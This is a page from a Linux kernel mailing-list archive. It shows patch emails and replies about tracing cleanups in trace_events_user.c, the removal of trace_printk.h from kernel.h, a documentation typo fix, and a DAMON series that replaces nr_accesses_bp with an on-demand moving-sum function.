	Steven Rostedt
  Cc: LKML, kernel-janitors
In-Reply-To: <6a37c46d-588d-406f-88fa-2f8562709e5f@web.de>

From: Markus Elfring <elfring@users.sourceforge.net>
Date: Mon, 22 Jun 2026 16:42:07 +0200

A single string should be put into a sequence within a loop.
Thus use the corresponding function “seq_puts” for one selected call.

The source code was transformed by using the Coccinelle software.

Signed-off-by: Markus Elfring <elfring@users.sourceforge.net>
---
 kernel/trace/trace_events_user.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
index a79b7c07dabb..ba9cc168280d 100644
--- a/kernel/trace/trace_events_user.c
+++ b/kernel/trace/trace_events_user.c
@@ -2781,7 +2781,7 @@ static int user_seq_show(struct seq_file *m, void *p)
 	hash_for_each(group->register_table, i, user, node) {
 		status = user->status;
 
-		seq_printf(m, "%s", EVENT_TP_NAME(user));
+		seq_puts(m, EVENT_TP_NAME(user));
 
 		if (status != 0) {
 			seq_puts(m, " # Used by");
-- 
2.54.0


^ permalink raw reply related

* [PATCH v2 1/2] tracing/user_events: Use seq_putc() in two functions
From: Markus Elfring @ 2026-06-22 15:10 UTC (permalink / raw)
  To: linux-trace-kernel, Masami Hiramatsu, Mathieu Desnoyers,
	Steven Rostedt
  Cc: LKML, kernel-janitors
In-Reply-To: <6a37c46d-588d-406f-88fa-2f8562709e5f@web.de>

From: Markus Elfring <elfring@users.sourceforge.net>
Date: Mon, 22 Jun 2026 16:37:18 +0200

Single characters should be put into a sequence. Thus use the corresponding
function “seq_putc” for selected calls.

The source code was transformed by using the Coccinelle software.

Signed-off-by: Markus Elfring <elfring@users.sourceforge.net>
---
 kernel/trace/trace_events_user.c | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
index c4ba484f7b38..a79b7c07dabb 100644
--- a/kernel/trace/trace_events_user.c
+++ b/kernel/trace/trace_events_user.c
@@ -1813,7 +1813,7 @@ static int user_event_show(struct seq_file *m, struct dyn_event *ev)
 
 	list_for_each_entry_reverse(field, head, link) {
 		if (depth == 0)
-			seq_puts(m, " ");
+			seq_putc(m, ' ');
 		else
 			seq_puts(m, "; ");
 
@@ -1825,7 +1825,7 @@ static int user_event_show(struct seq_file *m, struct dyn_event *ev)
 		depth++;
 	}
 
-	seq_puts(m, "\n");
+	seq_putc(m, '\n');
 
 	return 0;
 }
@@ -2794,13 +2794,13 @@ static int user_seq_show(struct seq_file *m, void *p)
 			busy++;
 		}
 
-		seq_puts(m, "\n");
+		seq_putc(m, '\n');
 		active++;
 	}
 
 	mutex_unlock(&group->reg_mutex);
 
-	seq_puts(m, "\n");
+	seq_putc(m, '\n');
 	seq_printf(m, "Active: %d\n", active);
 	seq_printf(m, "Busy: %d\n", busy);
 
-- 
2.54.0


^ permalink raw reply related

* [PATCH v2 0/2] tracing/user_events: More efficient data output in two functions
From: Markus Elfring @ 2026-06-22 15:07 UTC (permalink / raw)
  To: linux-trace-kernel, Masami Hiramatsu, Mathieu Desnoyers,
	Steven Rostedt
  Cc: LKML, kernel-janitors
In-Reply-To: <20260611085949.59017a55@gandalf.local.home>

From: Markus Elfring <elfring@users.sourceforge.net>
Date: Mon, 22 Jun 2026 16:58:32 +0200

Two update suggestions were taken into account from static source code analysis.

Markus Elfring (2):
  Use seq_putc() in two functions
  Replace a seq_printf() call by seq_puts() in user_seq_show()


v2:
Steven Rostedt requested to use seq_putc() calls more often.


 kernel/trace/trace_events_user.c | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

-- 
2.54.0


^ permalink raw reply

* Re: [PATCH v2 0/2] tracing: Remove trace_printk.h from kernel.h
From: Masami Hiramatsu @ 2026-06-22 14:44 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall, Yury Norov
In-Reply-To: <20260622130739.375198646@kernel.org>

On Mon, 22 Jun 2026 09:07:39 -0400
Steven Rostedt <rostedt@kernel.org> wrote:

> 
> Remove trace_printk.h by creating a trace_controls.h for those places that
> need access to tracing prototypes like tracing_off() and for the places that
> need trace_printk() directly, to have it included directly.
> 
> Changse since v1: https://lore.kernel.org/all/20260621093430.264983361@kernel.org/
> 
> - Create a trace_controls.h header to move the prototypes into and not
>   include it back into kernel.h
> 
> - Just remove trace_printk.h from kernel.h with no alternative to keep the
>   previous behavior.
> 
> Steven Rostedt (2):
>       tracing: Move non-trace_printk prototypes into trace_controls.h
>       tracing: Remove trace_printk.h from kernel.h
> 

The series looks good to me.

Acked-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>

for this series.

Thanks,

> ----
>  arch/powerpc/kvm/book3s_xics.c         |  1 +
>  arch/powerpc/xmon/xmon.c               |  1 +
>  arch/s390/kernel/ipl.c                 |  1 +
>  arch/s390/kernel/machine_kexec.c       |  1 +
>  drivers/gpu/drm/i915/gt/intel_gtt.h    |  1 +
>  drivers/gpu/drm/i915/i915_gem.h        |  2 ++
>  drivers/hwtracing/stm/dummy_stm.c      |  4 +++
>  drivers/infiniband/hw/hfi1/trace_dbg.h |  1 +
>  drivers/tty/sysrq.c                    |  1 +
>  drivers/usb/early/xhci-dbc.c           |  1 +
>  fs/ext4/inline.c                       |  1 +
>  include/linux/ftrace.h                 |  2 ++
>  include/linux/kernel.h                 |  1 -
>  include/linux/sunrpc/debug.h           |  1 +
>  include/linux/trace_controls.h         | 54 ++++++++++++++++++++++++++++++++
>  include/linux/trace_printk.h           | 56 ++--------------------------------
>  kernel/debug/debug_core.c              |  1 +
>  kernel/panic.c                         |  1 +
>  kernel/rcu/rcu.h                       |  2 ++
>  kernel/rcu/rcutorture.c                |  1 +
>  kernel/trace/ring_buffer_benchmark.c   |  1 +
>  kernel/trace/trace.h                   |  1 +
>  kernel/trace/trace_benchmark.c         |  1 +
>  lib/sys_info.c                         |  1 +
>  samples/fprobe/fprobe_example.c        |  1 +
>  samples/ftrace/ftrace-direct-too.c     |  1 -
>  samples/trace_printk/trace-printk.c    |  1 +
>  27 files changed, 86 insertions(+), 55 deletions(-)
>  create mode 100644 include/linux/trace_controls.h


-- 
Masami Hiramatsu (Google) <mhiramat@kernel.org>

^ permalink raw reply

* [PATCH] Documentation: tracing: fix typo in events documentation
From: Yudistira Putra @ 2026-06-22 14:37 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	linux-trace-kernel, linux-doc, linux-kernel, Yudistira Putra

Fix a typo in the tracing events documentation: "can by built up"
should be "can be built up".

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 Documentation/trace/events.rst | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Documentation/trace/events.rst b/Documentation/trace/events.rst
index 18d112963dec..581f2260614b 100644
--- a/Documentation/trace/events.rst
+++ b/Documentation/trace/events.rst
@@ -1064,7 +1064,7 @@ correct command type, and a pointer to an event-specific run_command()
 callback that will be called to actually execute the event-specific
 command function.
 
-Once that's done, the command string can by built up by successive
+Once that's done, the command string can be built up by successive
 calls to argument-adding functions.
 
 To add a single argument, define and initialize a struct dynevent_arg
-- 
2.43.0


^ permalink raw reply related

* [RFC PATCH v1.3 06/18] mm/damon/core: use damon_nr_accesses_mvsum() for damos region tracing
From: SeongJae Park @ 2026-06-22 14:21 UTC (permalink / raw)
  Cc: SeongJae Park, Andrew Morton, Masami Hiramatsu, Mathieu Desnoyers,
	Steven Rostedt, damon, linux-kernel, linux-mm, linux-trace-kernel
In-Reply-To: <20260622142139.30269-1-sj@kernel.org>

damon_nr_accesses_mvsum() returns a value same to nr_accesses_bp.  Also
the function is more simple and therefore more tolerant to errors.
Execution of the function would be more expensive than the simple read
of the field, but because the function is quite simple, the overhead
should be negligible.  Use it in the DAMON region exporting trace points
instead of the nr_accesses_bp.

Signed-off-by: SeongJae Park <sj@kernel.org>
---
 include/trace/events/damon.h | 8 +++++---
 mm/damon/core.c              | 5 +++--
 2 files changed, 8 insertions(+), 5 deletions(-)

diff --git a/include/trace/events/damon.h b/include/trace/events/damon.h
index 78388538acf44..8851727ae1627 100644
--- a/include/trace/events/damon.h
+++ b/include/trace/events/damon.h
@@ -78,9 +78,11 @@ TRACE_EVENT_CONDITION(damos_before_apply,
 
 	TP_PROTO(unsigned int context_idx, unsigned int scheme_idx,
 		unsigned int target_idx, struct damon_region *r,
-		unsigned int nr_regions, bool do_trace),
+		unsigned int nr_accesses, unsigned int nr_regions,
+		bool do_trace),
 
-	TP_ARGS(context_idx, scheme_idx, target_idx, r, nr_regions, do_trace),
+	TP_ARGS(context_idx, scheme_idx, target_idx, r, nr_accesses,
+		nr_regions, do_trace),
 
 	TP_CONDITION(do_trace),
 
@@ -101,7 +103,7 @@ TRACE_EVENT_CONDITION(damos_before_apply,
 		__entry->target_idx = target_idx;
 		__entry->start = r->ar.start;
 		__entry->end = r->ar.end;
-		__entry->nr_accesses = r->nr_accesses_bp / 10000;
+		__entry->nr_accesses = nr_accesses;
 		__entry->age = r->age;
 		__entry->nr_regions = nr_regions;
 	),
diff --git a/mm/damon/core.c b/mm/damon/core.c
index d6cc538172b40..ca68c4835c391 100644
--- a/mm/damon/core.c
+++ b/mm/damon/core.c
@@ -2442,7 +2442,7 @@ static void damos_apply_scheme(struct damon_ctx *c, struct damon_target *t,
 	struct damos *siter;		/* schemes iterator */
 	unsigned int sidx = 0;
 	struct damon_target *titer;	/* targets iterator */
-	unsigned int tidx = 0;
+	unsigned int tidx = 0, nr_accesses = 0;
 	bool do_trace = false;
 
 	/* get indices for trace_damos_before_apply() */
@@ -2457,6 +2457,7 @@ static void damos_apply_scheme(struct damon_ctx *c, struct damon_target *t,
 				break;
 			tidx++;
 		}
+		nr_accesses = damon_nr_accesses_mvsum(r, c);
 		do_trace = true;
 	}
 
@@ -2472,7 +2473,7 @@ static void damos_apply_scheme(struct damon_ctx *c, struct damon_target *t,
 		if (damos_core_filter_out(c, t, r, s))
 			return;
 		ktime_get_coarse_ts64(&begin);
-		trace_damos_before_apply(cidx, sidx, tidx, r,
+		trace_damos_before_apply(cidx, sidx, tidx, r, nr_accesses,
 				damon_nr_regions(t), do_trace);
 		sz_applied = c->ops.apply_scheme(c, t, r, s,
 				&sz_ops_filter_passed);
-- 
2.47.3

^ permalink raw reply related

* [RFC PATCH v1.3 00/18] mm/damon: optimize out nr_accesses_bp
From: SeongJae Park @ 2026-06-22 14:21 UTC (permalink / raw)
  Cc: SeongJae Park, Andrew Morton, Brendan Higgins, David Gow,
	Masami Hiramatsu, Mathieu Desnoyers, Shuah Khan, Steven Rostedt,
	damon, kunit-dev, linux-kernel, linux-kselftest, linux-mm,
	linux-trace-kernel

TLDR: Replace damon_region->nr_accesses_bp, which is easy to be wrong,
with a simpler on-demand moving sum function, damon_nr_accesses_mvsum().

Background
==========

DAMON's monitoring output (access pattern snapshot, or more technically
speaking, damon_region->nr_accesses) is completed once per aggregation
interval, which is 100 ms by default.  Users can arbitrarily increase
the interval for demand.  Under the suggested intervals auto-tuning
setup, it can span up to 200 seconds.  If the aggregation interval is
too long, the snapshot users cannot use it in reasonable time.  To
mitigate this, we introduced a new field of damon_region, namely
nr_accesses_bp.  It contains a pseudo moving sum of nr_accesses in bp
units and is updated for each sampling interval.

It turned out keeping it correctly updated every sampling interval is
not that easy.  From online parameter update feature development and
more experimental hacks, we found it is easy to be corrupted.  Once it
is corrupted, DAMON's monitoring outputs become quite insane.  Hence we
added a few validation checks.  It is easy  to be corrupted because it
requires every update per sampling interval to be correct.

Solution
========

There is no real reason to keep it updated every sampling interval.  Due
to the simple pseudo-moving sum mechanism and existing helper field
(last_nr_accesses), we can also calculate the pseudo moving sum on
demand in a much simpler way.

Implement a function for getting the pseudo moving sum on demand, and
replace nr_accessses_bp uses with the new function.  Also remove no more
needed tests for nr_accesses_bp and the per-sampling interval update
functions.  Finally, remove the nr_accesses_bp.  The new function is
quite simple.

Discussion
==========

Depending on the use case, multiple nr_accesses readers could be
executed in the same kdamond_fn() main loop iteration, which is executed
once per sampling interval.  Such readers include DAMON region exporting
tracepoints (damon_[region_]aggregated and damos_before_apply), DAMOS,
and DAMON sysfs interface logic for update_schemes_tried_regions
command.  In this case, the new function will be called multiple times
and this could be overhead compared to the old logic, which simply reads
the field without any additional work.  Nonetheless, the new function is
quite simple.  And the new approach does nothing while there is no need
to read.  The old approach had to execute its update function for each
region for every sampling interval.  Hence the new approach is believed
to be even more lightweight in common case, and the overhead is anyway
negligible.

One more advantage of this change is that one field from the
damon_region struct is removed.  On setups that uses a high number of
DAMON regions, this could be a potential memory space benefit.

Patches Sequence
================

Patch 1 introduces the new function for getting the pseudo moving sum of
nr_accesses on demands.  Patch 2 implements a unit test for the new
function's internal logic.  Patch 3 and 4 update monitoring logic and
the new function to ready for safe use on the existing logic.  Patches
5-7 replace uses of nr_accesses_bp in DAMOS, tracepoints and DAMON sysfs
interface with the new function, respectively.  Patches 8-10 removes
nr_accesses_bp validation functions in DAMON core, one by one.  Patches
11 and 12 further remove tests and test helper for nr_accesses_bp,
respectively.  Patches 13 removes the setups and updates or
nr_accesses_bp field.  Patches 14-16 cleans up function parameters that
are no more being used due to the previous patch.  Patch 17 removes the
function that was used for updating nr_accesses_bp field with its unit
test, which is the single remaining caller of the function.  Finally,
patch 18 removes damon_region->nr_accesses_bp field.

Changes from RFC v1.2
- RFC v1.2: https://lore.kernel.org/20260621155715.87932-1-sj@kernel.org
- Explicitly ignore nr_accesses from mvsum at the beginning of
  aggregation.
- Fix a typo in a commit message.
Changes from RFC v1.1
- RFC v1.1: https://lore.kernel.org/20260620172244.90953-1-sj@kernel.org
- Handle next_aggregation_sis < passed_sample_intervals in
  nr_accesses_mvsum().
- Always rescale ->last_nr_accesss for parameter changes.
- Remove unused attrs params from damon_update_region_access_rate() and
  its callers.
Changes from RFC v1
- RFC v1: https://lore.kernel.org/20260619193415.73833-1-sj@kernel.org
- Avoid divide-by-zero from zero aggregation interval.
- Call damon_nr_accesses_mvsum() for damos tracing only when it is enabled.
- Remove obsolete mentions of nr_accesses_bp in comments.

SeongJae Park (18):
  mm/damon: introduce damon_nr_accesses_mvsum()
  mm/damon/tests/core-kunit: test damon_mvsum()
  mm/damon/core: always update ->last_nr_accesses for intervals change
  mm/damon/core: handle unreset nr_accesses in damon_nr_accesses_mvsum()
  mm/damon/core: use damon_nr_accesses_mvsum() in __damos_valid_target()
  mm/damon/core: use damon_nr_accesses_mvsum() for damos region tracing
  mm/damon/sysfs-schemes: use damon_nr_accesses_mvsum() for damo regions
  mm/damon/core: remove damon_warn_fix_nr_accesses_corruption()
  mm/damon/core: remove damon_verify_reset_aggregated()
  mm/damon/core: remove damon_verify_merge_regions_of()
  mm/damon/tests/core-kunit: remove nr_accesses_bp setup and tests
  selftests/damon/drgn_dump_damon_status: do not dump nr_accesses_bp
  mm/damon/core: remove nr_accesses_bp setups and updates
  mm/damon/core: remove attrs param from
    damon_update_region_access_rate()
  mm/damonn/paddr: remove attrs param from __damon_pa_check_access()
  mm/damon/vaddr: remove attrs param from __damon_va_check_access()
  mm/damon/core: remove damon_moving_sum() and its unit test
  mm/damon: remove damon_region->nr_accesses_bp

 include/linux/damon.h                         |  15 +-
 include/trace/events/damon.h                  |   8 +-
 mm/damon/core.c                               | 201 +++++++-----------
 mm/damon/paddr.c                              |   9 +-
 mm/damon/sysfs-schemes.c                      |   6 +-
 mm/damon/tests/core-kunit.h                   |  37 ++--
 mm/damon/vaddr.c                              |  12 +-
 .../selftests/damon/drgn_dump_damon_status.py |   1 -
 8 files changed, 119 insertions(+), 170 deletions(-)

base-commit: e08d3bec1dc38cc991fc819afd698bf7bd07bd6d
-- 
2.47.3

^ permalink raw reply

page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox